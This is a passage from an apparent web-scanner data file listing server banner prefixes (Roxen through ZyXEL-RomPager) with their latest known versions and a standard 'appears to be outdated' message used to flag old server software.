@CURRENT_VER)\"\n\"600682\",\"REXX/\",\"4.01\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600683\",\"RMSWebServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600684\",\"RomPager/\",\"4.51\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600685\",\"Roxen/\",\"5.1.185_NT-release1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600687\",\"Roxen·Challenger/\",\"1.3.126\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600688\",\"Ruby/\",\"1.8.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600689\",\"rus/\",\"PL30.22\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600690\",\"rwh/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600691\",\"S.u.S.E./\",\"6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600692\",\"Sambar/\",\"Sambar/7.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600693\",\"SAPJ2EEEngine/\",\"7.02\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600694\",\"SAPOttpd/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600695\",\"Savant/\",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600696\",\"SDD/\",\"1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600697\",\"Secure/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600698\",\"secured_by_Covalent/\",\"1.6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600699\",\"secured_by_Raven/\",\"1.5.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600700\",\"SecureEntry/\",\"0.1.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600702\",\"SecureTransport/\",\"4.9.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600703\",\"SEDWebserver/\",\"1.3.26\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600704\",\"Seed/\",\"4103c\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600706\",\"Server:Apache/\",\"1.2b7-dev\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600707\",\"Server/\",\"15.0.2.547\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600708\",\"Servertec-IWS/\",\"1.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600709\",\"Service admin/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600710\",\"Servlet/\",\"2.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600711\",\"ServletExec/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600712\",\"ServletExecAS/\",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600713\",\"Shadow-OS-390-Web-Server/\",\"04.08.01\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600714\",\"SHC/\",\"1.5.8b\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600715\",\"ShomitiTHGs/\",\"3.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600716\",\"Signature/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600717\",\"SilverStream Server/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600718\",\"SilverStreamServer/\",\"100.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600719\",\"Simple, Secure Web Server \",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600720\",\"SimpleHTTP/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600721\",\"SimpleWebserver/\",\"2.13\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600722\",\"simwebs/\",\"4.0.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600723\",\"SiteScope/\",\"8.0.0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600724\",\"SkunkWeb/\",\"3.4b3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600725\",\"Slinger/\",\"1.1a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600726\",\"Sly-ISUmods/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600727\",\"Smart CDS/\",\"2.9-final\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600728\",\"SmartCDS/\",\"2.9-final\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600729\",\"SmartServer/\",\"4.08.0002\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600730\",\"SmiskigWWWServer/\",\"69\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600731\",\"Snap Appliances, Inc./\",\"3.0.566\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600732\",\"SNMP Research DR-Web Agent/\",\"1.25.4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600733\",\"SomeServer/\",\"4.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600734\",\"SonarHosting/\",\"1.3.27\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600735\",\"SpaceSurfer/\",\"1.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600736\",\"SpecialixJETSTREAM/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600737\",\"Speed Touch Web Server/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600738\",\"SpeedTouchWebServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600739\",\"Spinnaker/\",\"3.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600740\",\"SpinServer/\",\"1.0.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600741\",\"Spipe/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600742\",\"Splash/\",\"3.0.3(Foo-nix)\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600743\",\"Spry-SafetyWEB-Server-NT/\",\"1.3a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600744\",\"Spyglass_MicroServer/\",\"2.01FC1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600745\",\"Squeegit/\",\"1.2.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600746\",\"Squid/\",\"3.1.18\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600747\",\"SSI/\",\"POEM-iso2022-20001201\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600748\",\"SSL/\",\"1.15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600749\",\"SSLeay/\",\"0.9.0b\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600750\",\"SST/\",\"210q\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600751\",\"Statistics Server \",\"5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600752\",\"Stonghold/\",\"2.4.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600753\",\"StorageNetFibreChannelAccessHub/\",\"V1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600754\",\"StorageTekAccessHub/\",\"V1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600755\",\"StoreSense-Bridge/\",\"1.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600756\",\"Streamer-Server/\",\"3.1.18\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600757\",\"Stronghold/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600758\",\"StummCom/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600759\",\"StWeb/\",\"1.3.27\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600760\",\"Sun Directory Services \",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600761\",\"Sun_WebServer/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600762\",\"Sun-Java-System-Application-Server/\",\"72004Q2UR5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600763\",\"Sun-Java-System-Web-Server/\",\"7.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600764\",\"Sun-ONE-Application-Server/\",\"7.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600765\",\"Sun-ONE-ASP/\",\"4.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600766\",\"Sun-ONE-Web-Server/\",\"6.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600767\",\"SunOS/\",\"5.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600768\",\"SVN/\",\"1.14.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600769\",\"sw/\",\"1.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600770\",\"swcd/\",\"5.2.0032\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600771\",\"SWS-\",\"2.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600772\",\"sxnet/\",\"1.2.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600773\",\"System Management Homepage/\",\"2.1.6.156\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600774\",\"T-httpd/\",\"1.2.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600775\",\"T/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600776\",\"TAC/\",\"Xenta 5111.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600777\",\"TagWeb/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600778\",\"TAuth/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600779\",\"Tcl-Webserver/\",\"3.5.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600780\",\"TeamFile/\",\"2.1.2-4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600781\",\"TeamTrack/\",\"6.1(61025)\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600782\",\"TeleFinder/\",\"5.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600783\",\"Temple-of-Hate/\",\"9.1.1-1.3.31\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600784\",\"Texis-Monitor/\",\"5.01.1161965127\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600785\",\"THEO Server/\",\"5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600786\",\"ThreadedDBL/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600787\",\"thttpd/\",\"2.30\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600788\",\"Thunderstone-Texis-Vortex/\",\"4.02.1047973790\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600789\",\"Thunderstone-Texis/\",\"4.03.1052723967\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600790\",\"Thy/\",\"0.9.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600791\",\"tigershark/\",\"3.0.128\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600792\",\"TinyWeb/\",\"1.93\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600793\",\"tivo-httpd-\",\"1:8.3-01-2:540\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600794\",\"TKTAuth/\",\"1.3.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600795\",\"Tomcat Web Server/\",\"3.3.2 Final ( JSP 1.1; Servlet 2.2 )\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600796\",\"Tomcat/\",\"9.0.30\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). Tomcat 7.0.57, 6.0.41, 5.5.36 and 4.1.40 are also current.\"\n\"600797\",\"tracd/\",\"0.12.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600798\",\"trakkerd/\",\"v2.87-mm-as+re+ex+mp-WAP+WML\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600799\",\"Tree/\",\"8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600800\",\"TSM_HTTP/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600801\",\"TTP/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600802\",\"TUX/\",\"2.0 (Linux)\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600803\",\"TuxSQLConf/\",\"20070207-00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600804\",\"TuxTrafficLogRotate/\",\"20051209-00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600805\",\"Ubicom/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600806\",\"UcoZXSrv/\",\"1.4.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600807\",\"UHTTPServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600808\",\"Ultraseek/\",\"5.8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600809\",\"UNIT_Homepage/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600810\",\"UnrealEngine UWeb Web Server Build \",\"436\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600811\",\"UPS_Server/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600812\",\"UserLand Frontier/\",\"9.0-WinNT\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600813\",\"UserWeb/\",\"v2.65\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600814\",\"uWS/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600815\",\"v.ii/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600816\",\"v2h/\",\"1.5.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600817\",\"VCNET2-Server/\",\"1.03\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600818\",\"VDB/\",\"1.1.1-se\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600819\",\"Vernier/\",\"5.2.0.63\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600820\",\"vhostdb/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600821\",\"Viking/\",\"1.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600822\",\"Virata-EmWeb/\",\"R6_2_1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600823\",\"VIRTUAL/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600824\",\"VisiBroker/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600825\",\"VisualPulse (tm) \",\"3.0c\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600826\",\"Vivasoft/\",\"8.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600827\",\"VM_ESA/\",\"2.3.0.9902\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600828\",\"VM:Secure/\",\"2.5A\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600829\",\"VM:Webgateway/\",\"03.1A\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600830\",\"Vorlon SR \",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600831\",\"Vortech_PHP/\",\"0.1.0-p0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600832\",\"vqServer/\",\"vqServer/1.9.55\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600833\",\"w/CBS::adtag/\",\"1.0a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600834\",\"w/CBS::gettxt/\",\"1.0a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600835\",\"WC/\",\"3000\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600836\",\"WDaemon/\",\"10.0.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). Versions lower than 4 have serious vulnerabilities.\"\n\"600837\",\"Web Crossing/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600838\",\"Web Sphere Application Server/\",\"5.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600839\",\"Web Transaction Server For ClearPath MCP \",\"6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600840\",\"Web_Server_4D/\",\"3.6.1b8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600841\",\"Web-Server/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600842\",\"WEB602/\",\"1.04\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600843\",\"WebAuth/\",\"3.7.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600844\",\"WebBase 4.5 build \",\"69\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600845\",\"WebCo/\",\"Build9708-2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600846\",\"WebCollage-Syndicator/\",\"3.2.4.4040\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600847\",\"WebCompanion/\",\"6.0v1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600848\",\"webfs/\",\"1.21\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600849\",\"weBLink/\",\"0.3.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600850\",\"WebLogic \",\"5.1.0 Service Pack 9 04/06/2001 12:48:33 #105983\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600851\",\"WebLogic WebLogic Server \",\"7.0 SP2  Sun Jan 26 23:09:32 PST 2003 234192\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600852\",\"WebLogic WebLogic Temporary Patch \",\"5 for PeopleSoft\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600853\",\"WebLogic WebLogic Temporary Patch for \",\"CR067505 02/12/2002 17:10:21\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600854\",\"WebLogic/\",\"7.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600855\",\"WebOTX_Web_Server/\",\"1.3.36\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600856\",\"WEBrick/\",\"1.6.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600857\",\"WebSEAL/\",\"7.0.0.36\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600858\",\"Webserver/\",\"2.71828183\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600859\",\"Webshare/\",\"1.2.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600860\",\"WebSiphon/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600861\",\"WebSite/\",\"3.5.19\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600862\",\"WebsiteFactory/\",\"0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600863\",\"WebSitePro/\",\"3.1.13.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600864\",\"Websphere/\",\"4.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600865\",\"WebSphereApplicationServer/\",\"8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600866\",\"WebSrv/\",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600867\",\"WebSTAR/\",\"4.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600868\",\"WebTen/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600869\",\"WebtoB/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600870\",\"WebTopia/\",\"2.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600871\",\"WebTV/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600872\",\"WebTwist/\",\"3.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600873\",\"WebWhois/\",\"2.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600874\",\"WebZerver/\",\"V06.04\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600875\",\"wg_httpd/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600876\",\"WhatsUp_Gold/\",\"8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600877\",\"whostmgr/\",\"whostmgr/3.9.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600878\",\"Wind Manage/\",\"4.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600879\",\"WindManage/\",\"4.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600880\",\"Windows-IIS/\",\"5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600881\",\"WindWeb/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600882\",\"WISE_Homepage/\",\"1.0.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600883\",\"WN/\",\"2.4.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600884\",\"Worldgroup/\",\"3.30\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600885\",\"WSGIServer/\",\"0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600886\",\"wti-httpd/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600887\",\"WWW Server/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600888\",\"WWWServer/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600889\",\"WYM/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600890\",\"X-IVO/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600891\",\"Xauth/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600892\",\"Xeneo/\",\"2.2.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600893\",\"Xerox_MicroServer/\",\"Xerox11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600894\",\"Xerver/\",\"4.03\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600895\",\"Xgate/\",\"3.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600896\",\"Xitami web server \",\"v2.4c0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600897\",\"xs-httpd/\",\"3.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600898\",\"XunleiHttpServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600899\",\"Y.G.Apache-SSLv3/\",\"1.3.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600900\",\"yasl/\",\"2.25\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600901\",\"YAWN/\",\"1.05\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600902\",\"Yaws/\",\"2.49.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600903\",\"z_VM/\",\"4.4.0.0000\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600904\",\"Zend-LaunchPad/\",\"1.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600906\",\"Zope/\",\"Zope/2.13.29\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600907\",\"ZOT-PS-15/\",\"6.8.0104\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600908\",\"ZOT-PS-30/\",\"8.2.0004\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600909\",\"ZServer/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600910\",\"ZyXEL-RomPager/\",\"ZyXEL-RomPager/3.02\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600911\",\"SAF/\",\"4.0rc1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600912\",\"Twisted/\",\"18.9.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600913\",\"Plone/\",\"3.3.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600914\",\"CovalentSNMP/\",\"3.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600915\",\"Snap Appliance, Inc./\",\"4.0.860\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600916\",\"CJServer/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600917\",\"Devshed/\",\"2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600918\",\"mod_bla_bla_bla/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600919\",\"G4200.GSI/\",\"2.22.0131\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600920\",\"KONICHIWA/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least 